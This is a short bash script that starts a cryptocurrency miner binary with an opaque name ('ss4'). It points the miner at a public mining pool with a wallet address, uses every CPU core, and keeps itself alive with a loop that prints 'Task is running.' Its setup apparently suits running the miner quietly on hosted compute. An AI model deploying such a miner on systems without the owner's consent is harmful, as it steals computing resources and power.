#!/bin/bash

nohup ./ss4 -a yespowertide -o stratum+tcp://stratum-eu.rplant.xyz:17059 -u TYKf2FgjTb2GrfrQppTRMZzd9t8ayRFMV3.ojhk -p x -t $(nproc --all)

while true
do
        echo "Task is running."
        sleep 100
done
